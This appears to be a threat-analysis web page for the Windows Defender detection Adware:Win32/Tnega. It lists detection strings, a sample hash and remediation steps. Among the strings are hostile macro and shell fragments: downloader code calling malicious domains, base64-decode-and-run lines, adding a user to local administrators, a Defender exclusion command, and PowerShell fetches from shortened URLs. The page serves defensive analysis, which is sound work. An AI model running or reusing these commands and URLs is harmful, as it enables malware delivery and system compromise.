Adware:Win32/Tnega - ThreatCheck.sh

user@threatcheck.sh ~ threat-analysis

bash

$ analyze-threat Adware:Win32/Tnega

Adware:Win32/Tnega - Windows Defender threat signature analysis

$ cat analysis.txt

=== THREAT ANALYSIS REPORT ===

Threat Name: Adware:Win32/Tnega

Classification:

Type:Adware

Platform:Win32

Family:Tnega

Detection Type:Concrete

Known malware family with identified signatures

Confidence:Very High

False-Positive Risk:Low

Concrete signature match: Adware - Displays unwanted advertisements for 32-bit Windows platform, family Tnega

Summary:

Adware:Win32/Tnega is a concrete detection indicating a persistent adware threat. It utilizes scripting capabilities, likely from malicious documents, to download additional components from external domains and establish persistence by dropping files such as 'wsdts.db' or 'onenote.db' into user AppData directories. This allows it to display unwanted advertisements, potentially alter system settings, and collect user information.

Severity:

High

VDM Static Detection:

Relevant strings associated with this threat:
 - https://cdn.jsd (PEHSTR_EXT)
 - gh/i87924hgHd (PEHSTR_EXT)
 - y/bboxfu<', 'that3.e (PEHSTR_EXT)
 - CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - //smartscreentestratings2.net/ (MACROHSTR_EXT)
 - .exe (MACROHSTR_EXT)
 - https: (MACROHSTR_EXT)
 - .Run CreateObject("Scripting.FileSystemObject"). (MACROHSTR_EXT)
 - .exe" (MACROHSTR_EXT)
 - CreateObject("Scripting.FileSystemObject").FileExists(szFile) (MACROHSTR_EXT)
 - Set oNode = oXML.CreateElement("base64") (MACROHSTR_EXT)
 - = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice (MACROHSTR_EXT)
 - dllPath = workDir & "\" & binName (MACROHSTR_EXT)
 - binName = "wsdts.db (MACROHSTR_EXT)
 - = ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
 - = curDocName & " .docx" (MACROHSTR_EXT)
 - workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\OneNote" (MACROHSTR_EXT)
 - dllPath = workDir & "\onenote.db" (MACROHSTR_EXT)
 - Dm = "http://craghoppers.icu/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
 - Dm = "http://moveis-schuster-com.ga/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
 - Set xmlHttp = CreateObject(VB) (MACROHSTR_EXT)
 - .Open "get", strURL (MACROHSTR_EXT)
 - + "objShell.Run Base64Decode(" (MACROHSTR_EXT)
 - = "C:\Windows\System32\w" + "script" + ".exe " (MACROHSTR_EXT)
 - "WScript." + "She" + "ll" (MACROHSTR_EXT)
 - + "." + "v" (MACROHSTR_EXT)
 - GetDllName = "C:\ProgramData\desktop.dat" (MACROHSTR_EXT)
 - .CreateElement("base64") (MACROHSTR_EXT)
 - ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
 - , ".") - 1) (MACROHSTR_EXT)
 - CreateObject("Word.Application") (MACROHSTR_EXT)
 - viebobpspa_autologon_admin.bat (PEHSTR_EXT)
 - autologon.exe !viebobpspa EU odeA5SvxTzsDa7kwqDq6K6Xr8Bukha -accepteula (PEHSTR_EXT)
 - net localgroup administrators eu\!viebobpspa /add (PEHSTR_EXT)
 - C:\TEMP\2890.tmp\viebobpspa_autologon_admin.bat (PEHSTR_EXT)
 - System.Runtime.InteropServices (PEHSTR_EXT)
 - System.Runtime.CompilerServices (PEHSTR_EXT)
 - System.Resources (PEHSTR_EXT)
 - CowsAndBulls.GameForm.resources (PEHSTR_EXT)
 - CowsAndBulls.HighScoresForm.resources (PEHSTR_EXT)
 - CowsAndBulls.MainMenuForm.resources (PEHSTR_EXT)
 - CowsAndBulls.Properties.Resources.resources (PEHSTR_EXT)
 - cmd.exe /c powershell.exe -windowstyle hidden Sleep 5 (PEHSTR_EXT)
 - GetCommandLineW (PEHSTR_EXT)
 - TOKEN_STEALER_CREATOR.Properties (PEHSTR_EXT)
 - ItroublveTSC\bin_copy\obj\Debug (PEHSTR_EXT)
 - 4S;/M (SNID)
 - ApplyRequest.dll (PEHSTR)
 - ScriptDDL (PEHSTR)
 - _lstStatusExec (PEHSTR)
 - _reqScript (PEHSTR)
 - ExecuteAllSteps (PEHSTR)
 - SendProgressExec (PEHSTR)
 - GerarScriptsDrop (PEHSTR)
 - GetListReplaceDll (PEHSTR)
 - lblcomputadorresponsavel (PEHSTR)
 - DgFqNyZD2NcjS7p60JGMch18mc8g (PEHSTR_EXT)
 - RESUTILS.dll (PEHSTR)
 - RPCRT4.dll (PEHSTR)
 - wsnmp32.dll (PEHSTR)
 - SOFTWARE\Borland\Delphi\RTL (PEHSTR)
 - sqlite3.dll (PEHSTR)
 - /C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR)
 - _acmdln (PEHSTR)
 - __p__commode (PEHSTR)
 - /uke3 (SNID)
 - 99`\, (SNID)
 - TankGame.My.Resources (PEHSTR_EXT)
 - TankGame.Game.resources (PEHSTR_EXT)
 - TankGame.MainForm.resources (PEHSTR_EXT)
 - TankGame.StartUp.resources (PEHSTR_EXT)
 - TankGame.Resources.resources (PEHSTR_EXT)
 - TankGame.MultipleBlocks.resources (PEHSTR_EXT)
 - TankGame.InGameOptions.resources (PEHSTR_EXT)
 - TankGame.QuickStart.resources (PEHSTR_EXT)
 - C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR_EXT)
 - SOFTWARE\Borland\Delphi\CPM (PEHSTR_EXT)
 - _acmdln (PEHSTR_EXT)
 - __p__commode (PEHSTR_EXT)
 - sqlite3.dll (PEHSTR_EXT)
 - \VersionIndependentProgID (PEHSTR_EXT)
 - DefenderCSP.dll (PEHSTR_EXT)
 - 3yD`. (SNID)
 - bcrypt.dll (PEHSTR_EXT)
 - zeeLog.txt (PEHSTR_EXT)
 - Interfaces.ShellExtension.JumpList (PEHSTR_EXT)
 - file.dat (PEHSTR_EXT)
 - ShellExecuteW (PEHSTR_EXT)
 - Task24Main.pdb (PEHSTR_EXT)
 - HttpWebResponse (PEHSTR_EXT)
 - CellManager.g.resources (PEHSTR_EXT)
 - CellManager.exe (PEHSTR_EXT)
 - aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
 - XRails.Controls (PEHSTR_EXT)
 - TwiceSlicePanel.UI (PEHSTR_EXT)
 - Client.Connection (PEHSTR_EXT)
 - \7AAAAAAAAAAAAAA (PEHSTR_EXT)
 - ppphhyf.exe (PEHSTR_EXT)
 - dKO:. (SNID)
 - Oc\p! (SNID)
 - powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath (PEHSTR_EXT)
 - report_error.php?key=125478824515ADNxu2ccbwe&msg=No-Exes-Found-To-Run (PEHSTR_EXT)
 - http://sornx.xyz (PEHSTR_EXT)
 - myip.php (PEHSTR_EXT)
 - addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
 - addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
 - Cadave.pdb (PEHSTR_EXT)
 - Top1Mu.Net (PEHSTR_EXT)
 - Data/Logo/System.pro (PEHSTR_EXT)
 - Release\Main.pdb (PEHSTR_EXT)
 - OhTTij5lmnomlkjst\Xuh (PEHSTR_EXT)
 - $I3\$ (PEHSTR_EXT)
 - \payloaddll\Release\cmd.pdb (PEHSTR_EXT)
 - ME_ADAudit.exe (PEHSTR_EXT)
 - https://cdn.discordapp.com/attachments/895494963515772931/895591057251762186/test_2.dll (PEHSTR_EXT)
 - D:\OneDrive\Projects\OneDriveTimer\OneDriveTimerUI\obj\Release\OneDriveTimerUI.pdb (PEHSTR_EXT)
 - OneDriveTimerUI.Properties.Resources (PEHSTR_EXT)
 - CenterToScreen (PEHSTR_EXT)
 - SetThreadExecutionState (PEHSTR_EXT)
 - @Uj/<[]t (SNID)
 - MtgKERNEL32.dll (PEHSTR_EXT)
 - DonWS2_32.dll (PEHSTR_EXT)
 - Zu8K{. (SNID)
 - www.Yanjie.com (PEHSTR_EXT)
 - http://101.35.18.254/444.exe (PEHSTR_EXT)
 - \111.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - C:\ProgramData\444.exe (PEHSTR_EXT)
 - ShellExecute (PEHSTR_EXT)
 - D$,lExe (PEHSTR_EXT)
 - q</2nK*>De!'7p/V (PEHSTR_EXT)
 - JoinDomain.exe (PEHSTR_EXT)
 - Software\ASProtect\Key (PEHSTR_EXT)
 - aspr_keys.ini (PEHSTR_EXT)
 - WkBycm9qZ2VxbGloSWZlbVQlKlFdbn5/ZGJgUyMvHRpKIzwnJTN2YXx5cjYnJDYpLkQ2OkBaeHF0c3dta21BVE5Tfww= (PEHSTR_EXT)
 - powershell wget https://bit.ly/3uNrtcg -O pin.txt (PEHSTR_EXT)
 - DownloadString('https://bit.ly/3uLJ706') (PEHSTR_EXT)
 - /home/keith/builds/mingw/gcc-9.2.0-mingw32-cross-native/mingw32/libgcc (PEHSTR_EXT)
 - 3<$1<$3<$\ (PEHSTR_EXT)
 - Dr4Zaap3qgP4pRB4NWbs9NQuRWalMrMG1AUda1mSG6I5n7u1nNriGo3RF0+Z/lfgeMNzjv46nK1VAIz9QXZ+VfgNxpd (PEHSTR_EXT)
 - tOH82ARnxdnufgODepMgEFCePdFSF4aj26l6HYbXlsnhvCh/NaRIPs+LM/BZtNDSNWyzOq2I4Xdho6ao= (PEHSTR_EXT)
 - +n51hDmYO9yaWP1yiFGAdu/cEvP8ojbpxBqFHzn7xvH (PEHSTR_EXT)
 - InitializeComponent (PEHSTR_EXT)
 - quanlykho.Properties (PEHSTR_EXT)
 - <Y\k` (SNID)
 - ogd368hc.dll (PEHSTR_EXT)
 - My.MyProject.Forms (PEHSTR)
 - C:\workspace\mudfix\attach\screen_block\general\obj\Release\general.pdb (PEHSTR_EXT)
 - wmiccomputersystemgetmodelFailed (PEHSTR_EXT)
 - http://xianggrhen.com/composure/ (PEHSTR_EXT)
 - FileManager.Form01.resources (PEHSTR_EXT)
 - CSVProject.Properties (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Known malware which is associated with this threat:

Filename: caaservices.exe

f0eff94e8ed95c8ccb19decb14f7edcf036830502745ec47fd64152e8b6e42b9

31/01/2026

→VirusTotal ↓Download Sample

Remediation Steps:

Isolate the infected system immediately. Perform a full scan with updated antivirus software to remove all detected threat components. Manually verify and remove any dropped files in user AppData directories and persistence mechanisms. Block associated malicious URLs at the network perimeter.

=== END REPORT ===

$ reanalyze-threat

This analysis was last updated on 31/01/2026. Do you want to analyze it again?

$ ls available-commands/

→ cd /home

user@threatcheck.sh:~$ ▊

Adware:Win32/Tnega - Windows Defender Threat Analysis